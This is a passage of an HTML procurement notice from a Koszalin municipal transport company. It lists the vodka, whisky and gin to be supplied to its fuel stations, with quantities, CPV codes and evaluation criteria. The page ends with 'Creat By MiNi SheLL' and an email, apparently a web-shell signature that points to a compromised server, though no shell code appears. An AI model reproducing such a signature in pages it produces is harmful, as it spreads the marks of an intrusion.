18.	DRINK o zawartości alkoholu  5,5%  ( butelka szklana) o pojemności 25 l; typu  SOBIESKI DRINK   lub równoważne;	80 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.93.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzedaż i dostawa napojów alkoholowych dla stacji paliw Miejskiego Zakładu Komunikacji Spółka z o.o. w Koszalinie - zadanie 3 wódka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa przedmiotu zamówienia	Ilość  zapotrzebowania;
1.	Gin o zawartości alkoholu  40%  (butelka szklana) o pojemności 0,7 l; typu LUBUSKI lub równoważne;	4 szt.;
2.	Wódka o zawartości alkoholu 32%  ( butelka szklana) o pojemności 0,2 l; typu LUBELSKA CYTRYNÓWKA lub równoważne;	60 szt.;
3.	Wódka o zawartości alkoholu 32%  ( butelka szklana) o pojemności 0,5 l; typu LUBELSKA WISNIÓWKA lub równoważne;	40 szt.;
4.	Wódka o zawartości alkoholu  32%  ( butelka szklana) o pojemności 0,2 l; typu LUKSUSOWA WIŚNIOWA lub równoważne;	60 szt.;
5.	Whisky o zawartości alkoholu 40%  ( butelka szklana) o pojemności 0,5 l; typu BALLANTINES  lub równoważne;	4 szt.;
6.	Whisky o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu BALLANTINES  lub równoważne;	6 szt.;
7.	Whisky o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu GRANT`S  lub równoważne;	5 szt.;
8.	Whisky o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu GRANT`S  lub równoważne;	5 szt.;
9.	Whisky o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu JACK DANIELS lub równoważne;	4 szt.;
10.	Whisky o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu JACK DANIELS lub równoważne;	10 szt.;
11.	Whisky o zawartości alkoholu 40%  ( butelka szklana) o pojemności 0,5 l; typu JOHNNIE WALKER RED  lub równoważne;	10 szt.;
12.	Whisky o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu JOHNNIE WALKER RED  lub równoważne;	10 szt.;
13.	Wódka o zawartości alkoholu 40%  ( butelka szklana) o pojemności 0,5 l; typu ABSOLUT lub równoważne;	4 szt.;
14.	Wódka o zawartości alkoholu 40%  ( butelka szklana) o pojemności 0,1 l; typu ABSOLWENT lub równoważne;	100 szt.;
15.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,2 l; typu ABSOLWENT lub równoważne;	100 szt.;
16.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu ABSOLWENT lub równoważne;	100 szt.;
17.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu ABSOLWENT lub równoważne;	10 szt.;
18.	Wódka o zawartości alkoholu  36%  ( butelka szklana) o pojemności 0,1 l; typu BALSAM KRESOWY  lub równoważne;	100 szt.;
19.	Wódka o zawartości alkoholu  36%  ( butelka szklana) o pojemności 0,2 l; typu BALSAM KRESOWY  lub równoważne;	100 szt.;
20.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,2 l; typu BOLS  lub równoważne;	100 szt.;
21.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu BOLS  lub równoważne;	60 szt.;
22.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 1 l; typu CZYSTA DE LUX  lub równoważne;	30 szt.;
23.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu CZYSTA DE LUX  lub równoważne;	150 szt.;
24.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,2 l; typu CZYSTA DE LUX  lub równoważne;	450 szt.;
25.	Wódka o zawartości alkoholu 40%  ( butelka szklana) o pojemności 0,7 l; typu KRUPNIK  lub równoważne;	200 szt.;
26.	Wódka o zawartości alkoholu  40% ( butelka szklana) o pojemności 0,2 l; typu Luksusowa lub równoważne;	150 szt.;
27.	Wódka o zawartości alkoholu  40% ( butelka szklana) o pojemności 0,5l; typu Luksusowa lub równoważne;	100 szt.;
28.	Wódka o zawartości alkoholu  40% ( butelka szklana) o pojemności 0,7l; typu Luksusowa lub równoważne;	10 szt.;
29.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 1 l; typu Luksusowa lub równoważne;	5 szt.;
30.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu Maximus lub równoważne;	20 szt.;
31.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu Maximus lub równoważne;	5 szt.;
32.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu SMIRNOFF lub równoważne;	20 szt.;
33.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu SMIRNOFF lub równoważne;	5 szt.;
34.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu SOBIESKI lub równoważne;	10 szt.;
35.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,2 l; typu STAROGARDZKA lub równoważne;	50 szt.;
36.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu STAROGARDZKA lub równoważne;	10 szt.;
37.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu WYBOROWA lub równoważne;	50 szt.;
38.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu WYBOROWA lub równoważne;	20 szt.;
39.	Wódka o zawartości alkoholu  38%  ( butelka szklana) o pojemności 0,5 l; typu ŻOŁĄDKOWA GORZKA lub równoważne;	150 szt.;
40.	Wódka o zawartości alkoholu  38%  ( butelka szklana) o pojemności 0,7 l; typu ŻOŁĄDKOWA GORZKA lub równoważne;	5 szt.;
41.	Wódka o zawartości alkoholu  38%  ( butelka szklana) o pojemności 0,5 l; typu ŻOŁĄDKOWA GORZKA Z MIĘTĄ lub równoważne;	10 szt.;
42.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,2 l; typu ŻUBRÓWKA BIAŁA lub równoważne;	140 szt.;
43.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu ŻUBRÓWKA BIAŁA lub równoważne;	200 szt.;
44.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu ŻUBRÓWKA  lub równoważne;	20 szt.;
45.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu ŻUBRÓWKA  lub równoważne;	5 szt.;
46.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu CZYSTA DE LUX  lub równoważne;	300 szt.;
47.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu FINLANDIA LIME  lub równoważne;	5 szt.;
48.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu FINLANDIA   lub równoważne;	35 szt.;
49.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu FINLANDIA   lub równoważne;	20 szt.;
50.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu FINLANDIA CRANBERRY   lub równoważne;	5 szt.;
51.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu FINLANDIA CRANBERRY   lub równoważne;	5 szt.;
52.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,2 l; typu ŻOŁĄDKOWA GORZKA lub równoważne;	300 szt.;
53.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,2 l; typu ŻOŁĄDKOWA GORZKA Z MIĘTĄ  lub równoważne;	100 szt.;
54.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu VODKA 1906  lub równoważne;	10 szt.;
55.	Whisky o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,7 l; typu THE FAMOUS GROPUSE  lub równoważne;	10 szt.;
56.	Whisky o zawartości alkoholu 40%  ( butelka szklana) o pojemności 0,5 l; typu PASSPORT  lub równoważne;	10 szt.;
57.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,1 l; typu CZYSTA DE LUX  lub równoważne;	100 szt.;
58.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,2 l; typu KRUPNIK  lub równoważne;	600 szt.;
59.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,5 l; typu KRUPNIK  lub równoważne;	500 szt.;
60.	Wódka o zawartości alkoholu 38%  ( butelka szklana) o pojemności 0,5 l; typu KRUPNIK CYTRYNOWY lub równoważne;	20 szt.;
61.	Wódka o zawartości alkoholu  40%  ( butelka szklana) o pojemności 0,1 l; typu STAROGARDZKA  lub równoważne;	20 szt.;
62.	Wódka o zawartości alkoholu  30%  ( butelka szklana) o pojemności 0,5 l; typu WYBOROWA, CITRUS SQUEE, GINGER BITE, LIM&MINT, MANGO SPLASH lub równoważne;	30 szt.;
63.	Wódka o zawartości alkoholu  40%  (butelka szklana) o pojemności 0,5 l; typu STOCK PRESTIGE  lub równoważne;	30 szt.;
64.	Wódka o zawartości alkoholu  40%  (butelka szklana) o pojemności 0,2 l; typu STOCK PRESTIGE lub równoważne;	80 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.91.11.00-8, 15.91.10.00-7, 15.91.12.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com